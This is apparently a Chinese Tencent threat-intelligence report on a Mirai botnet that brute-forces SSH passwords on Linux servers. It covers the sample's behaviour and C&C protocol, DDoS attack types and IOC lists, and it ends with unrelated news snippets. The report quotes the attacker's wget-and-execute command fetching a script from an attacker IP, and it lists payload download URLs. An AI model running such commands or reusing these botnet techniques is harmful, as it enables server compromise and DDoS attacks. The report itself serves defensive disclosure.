感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw
腾讯安全威胁情报中心检测到Mirai僵尸 *** 大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸 *** 二进制木马程序。
腾讯安全威胁情报中心检测到Mirai僵尸 *** 大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸 *** 二进制木马程序。
Mirai是一个大型僵尸 *** ,主要通过SSH和telnet弱口令进行感染,攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器,控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据,Mirai僵尸 *** 已在全国造成上万台设备感染,其中感染最多的为广东、上海和北京。
腾讯安全专家建议企业linux管理员避免使用弱口令,关闭非必须启用的端口,以防御黑客利用弱口令爆破的方式远程入侵,腾讯安全系列产品也针对Mirai僵尸 *** 的技术特点进行响应,清单如下:
场景
胁
情
报
威胁情报云查服务
(SaaS)
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
高级威胁追溯系统
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
防护
(Cloud Firewall,CFW)
1)Mirai僵尸 *** 关联的IOCs已支持识别检测;
2)告警弱口令爆破行为。
有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
(Cloud Workload Protection,CWP)
2)告警弱口令爆破行为。
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
高级威胁检测系统
(腾讯御界)
关于T-Sec高级威胁检测系统的更多信息,可参考:
https://cloud.tencent.com/product/nta
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
攻击者通过SSH(22端口)弱口令爆破进行远程攻击,攻击成功后执行如下shellcode:
cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh
shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行,reportandyougaybins.sh脚本内容如下:
reportandyougaybins.sh主要功能为下载和执行二进制木马程序,会分别从以下地址下载基于多个架构体系的样本,其中i586、i686、x86可感染基于Intel处理器的Linux服务器:
http[:]//193.228.91.123/mips
http[:]//193.228.91.123/mipsel
http[:]//193.228.91.123/sh4
http[:]//193.228.91.123/x86
http[:]//193.228.91.123/armv6l
http[:]//193.228.91.123/i686
http[:]//193.228.91.123/powerpc
http[:]//193.228.91.123/i586
http[:]//193.228.91.123/m68k
http[:]//193.228.91.123/sparc
http[:]//193.228.91.123/armv4l
http[:]//193.228.91.123/armv5l
以i586为例进行分析,该样本的主要功能为与C&C地址通信,接收远程命令对目标发起DDOS攻击。在IOT设备中,通常会有看门狗(watchdog)进程,不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能,如果未成功关闭,则进入循环不断向其发送保活指令0x80045705。
将木马进程名替换为”/usr/ *** in/dropbear”或者”sshd”隐藏自身。
从/proc/net/route中获取本机IP。
初始化table,并将后续要使用的数据添加到table中。
然后table_retrieve_val从table中取出数据,table_lock_val和table_unlock_val分别为加密和解密数据,解密函数在toggle_obf()中实现,解密 *** 是将数据与table_key进行循环异或,其中table_key=0xDEDEFFBA。
解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串“arch xxx”,xxx为设备平台类型。
Mirai与C&C服务器通信TCP流:
获取C&C服务器返回的数据后,进入processCmd处理接收到的命令。
Mirai可根据命令向目标发起以下类型的DDoS攻击:”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。
HTTP攻击:
UDP攻击:
TCP攻击:
SYN攻击:
ACK攻击:
IP
193.228.91.123
194.180.224.103
45.95.168.138
45.95.168.190
37.49.224.87
193.228.91.124
185.172.110.185
C&C
194.180.224.103:3982
MD5
649a06f5159fc4e8ee269a9e0e1fd095
8bb40eb446abb7472cb3a892fd2450b4
3f3f8184219514d5834df94f362c74bc
ef3b89e44a3a4973575a876ee5105cec
34033f561d196495e5c4780327acca0a
6f637a4ccfd00d9c2e08ecb84ce0b987
03ff0f5521631db7fa0d7990b5b4c19e
91c0f5304438a42ae5f28c8c0ff15954
536accde3643cb8294dd671ae5bdb3a2
9789917095d92cfe507e5fc2266667a1
8bafcd3d57dc597af4b6cb497cf0a0de
7e8e28631962dd5d52cbd93e50e7916e
7bfd106fe9d41c658f3be934346d3ff6
f0d5b7e31b4308c5ec326de9304bd3f4
bd1db394d52b950eed972eae93b80469
8b49a58a0bcb93afe72f1e3c1d800515
97a3699b819496892788b5c7a24be868
990fe40e991b9813a4f73b115ba160cb
2c0cc3d82871cfc05d38ea0a04f7f80a
26c56b011a494886e758d12fc07f6951
6e6d56669554c492ec4b1a9abd23e35b
64e5195e9cde652de6b2623d2d3e098d
1eeee50672a42dc2e55c6d4126afaf26
f6bbcf50aeda03aab1b5bc21b3df3e99
8e7d3e4bedf9bc3ed8a67890edc36590
556bd1d4d93abf19b4075d12ffef02a8
0d5302aa5491b3944566a212ca205923
ef72d6cc859438142a166f1d3ea4d462
193f92152f483aeb7ebe6d42855d9f27
1de00b44ef800a9d878de591fc43b854
b6e5bfb4b2f75d828022b84a247e99f2
039f379f3a36b4ab982a5ada7ceea078
51547b23165bc6f205ec3625840f3800
92137cf8ff782e15995919ebaa658474
94e027f4d33900f116bcf176aba726de
aefe0411bd89a9b97c1741b75c9f7d71
d15256b7a475f8934daf79364b0885a1
c624ed18ad756aa6f41a70fe90102d78
5ff2fc4de3a059b504e09b7b1663ac1f
fe6d19da030b1d299c35e89639d567bd
24a2659c72a980997161950926063b84
51b2190aa408ae08c6c9bf8dc8acc6e0
ecd696438914cc3c60dbf6de0df48f87
b45af2197eb3d12a199a40a048a36db6
32ef86b0358793f7ceffe1822bbf70e1
60fd7ed2e1ad0d41875d761b899766c4
0970f7f309bc678b0117d600e3f80f5f
a1dc1c62dba56af6a8b25767074d691d
1cca73d23c7e50f4111815e840bd8960
42c87649e776dd73aa06033f9b8b750e
08dc3f3c77161e1cc349d91263f76b8c
61915eb8d8742fea42d3683c7255945a
000466d4c6c06398042851a7c049f6b6
0be41e0b52c51ab4ad966513455550b1
6290db15f07f6ebb114824b912a10129
fe19b99077ef4fe492107e4a9b943094
9068c1c69ab5c6ba80f01bab1a1a2ad4
8bb40eb446abb7472cb3a892fd2450b4
2b8796693b5f578c40611e5221fb4788
9f71d8839d89f7bed716bb3f509eb22f
47f12cf0806d2875c592a7d15e266ee6
8ee73860cfe02ca529671c060c18cf00
9e91347c4d8afad598d21e446f967fb2
71d2dc0728e710e4f939c97e88929930
672380fd4c58302e1c48a45e75c580d7
143f7de27921db16b08cea70bb3bef7b
63db9805775b20dae4c0f06e03585446
4a751ef5ef5e48cfef33bd29e2a4a5b7
00bf4ee5a64971260683e047719c0dd8
028b7629ff410f429ba65db1f6779226
URL
http[:]//193.228.91.123/ares.sh
http[:]//193.228.91.123/arm7
http[:]//193.228.91.123/armv6l
http[:]//193.228.91.123/i686
http[:]//193.228.91.123/33bi/Ares.ppc
http[:]//193.228.91.123/33bi/Ares.arm6
http[:]//193.228.91.123/33bi/ares.armebv7
http[:]//193.228.91.123/33bi/ares.mips
http[:]//193.228.91.123/33bi/Ares.m68k
http[:]//193.228.91.123/33bi/ares.mpsl
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4
http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc
http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
http[:]//193.228.91.123/reportandyougaybins.sh
http[:]//193.228.91.123/mips
http[:]//193.228.91.123/mipsel
http[:]//193.228.91.123/sh4
http[:]//193.228.91.123/x86
http[:]//193.228.91.123/armv6l
http[:]//193.228.91.123/i686
http[:]//193.228.91.123/powerp
http[:]//193.228.91.123/i586
http[:]//193.228.91.123/m68k
http[:]//193.228.91.123/sparc
http[:]//193.228.91.123/armv4l
http[:]//193.228.91.123/armv5l
http[:]//194.180.224.103/mips
http[:]//194.180.224.103/mipsel
http[:]//194.180.224.103/sh4
http[:]//194.180.224.103/x86
http[:]//194.180.224.103/armv6l
http[:]//194.180.224.103/i686
http[:]//194.180.224.103/powerpc
http[:]//194.180.224.103/i586
http[:]//194.180.224.103/m68k
http[:]//194.180.224.103/sparc
http[:]//194.180.224.103/armv4l
http[:]//194.180.224.103/armv5l
参考链接:
https://www.freebuf.com/articles/terminal/117927.html
http://blog.nsfocus.net/mirai-source- *** ysis-report/
Hackernews 编译,转载请注明出处: 一个名为“RED-LILI”的攻击者发布了近800个恶意模块,与正在进行的针对 NPM 软件包库的大规模供应链攻击活动联系紧密。 以色列安全公司 Checkmarx 说: “通常,攻击者使用一个匿名的一次性 NPM 帐户发动攻击。”“这一次,攻击...
眼下,勒索软件已经成为互联网上的一种趋势,它的目标包括企业、政府机构、医院和学校。这是一个几十年前就存在的问题,但在过去几年中变得非常普遍。最初,黑客以个人为目标,要求提供几百美元的比特币,但现在他们追求更大的目标,他们可以勒索更大的金额,并且被勒索放在没有电脑和服务器的情况下无法继续正常使用 密...
经历了持续一年多的追踪,网络安全研究人员终于摸清了“中东之眼”新闻网站入侵事件的来龙去脉。由 ESET 周二发布的报告可知,一群黑客入侵了总部位于伦敦的这家热门新闻网站。这家网站着眼于中东地区的新闻报道,而攻击者的最终目标却是网站访客。 伊朗驻阿布扎比大使馆网站的脚本注入 据悉,这轮黑客活动一直从...
早在 5 月,微软就认定有俄罗斯背景的 NOBELIUM 黑客组织要对持续数月的 SolarWinds 网络攻击事件负责,并同企业、政府和执法机构达成了合作,以遏制此类网络攻击的负面影响。早些时候,微软更进一步地剖析了 NOBELIUM 使用的一套更加复杂的恶意软件传送方法。可知其用于造成破坏,并获...
援引以色列时报报道,网络安全公司 Check Point 发现了令人不安的统计数据:每周针对教育机构的网络攻击数量显著增加。学校、学院和研究机构是目标组织之一。2021 年 7 月,每个机构平均每周发生 1739 次攻击,比去年同月增长 29%。 受该问题影响最大的 3 个国家包括: ● 印度 –...
白宫发布声明称,美国总统乔·拜登周五与俄罗斯总统弗拉基米尔·普京通电话,敦促普京采取行动打击该国的黑客。美国认为,世界各地公司最近遭到的勒索攻击是俄罗斯黑客所为。声明说,“拜登强调俄罗斯需要采取行动打击在俄罗斯运作的勒索软件组织,并强调他致力于继续应对勒索软件构成的更广泛威胁。” 声明称,拜登...